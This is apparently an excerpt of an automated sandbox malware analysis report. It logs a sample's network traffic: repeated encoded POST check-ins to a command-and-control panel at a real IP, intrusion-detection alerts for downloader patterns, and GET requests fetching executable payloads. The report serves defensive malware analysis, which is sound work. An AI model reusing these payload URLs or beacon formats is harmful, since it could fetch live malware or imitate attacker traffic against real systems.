                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Source: Joe Sandbox ViewIP Address: 185.215.113.103 185.215.113.103
                  Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:64681 -> 185.215.113.103:80
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:64682 -> 185.215.113.37:80
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:64695 -> 185.215.113.103:80
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.103
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0040AA09 SetCurrentDirectoryA,GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,0_2_0040AA09
                  Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
                  Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103If-Modified-Since: Wed, 25 Sep 2024 08:32:53 GMTIf-None-Match: "66000-622ed77d44b57"
                  Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.103Cache-Control: no-cache
                  Source: unknownHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: skotes.exe, 0000001C.00000002.4669012464.0000000000743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.103/steam/random.exe
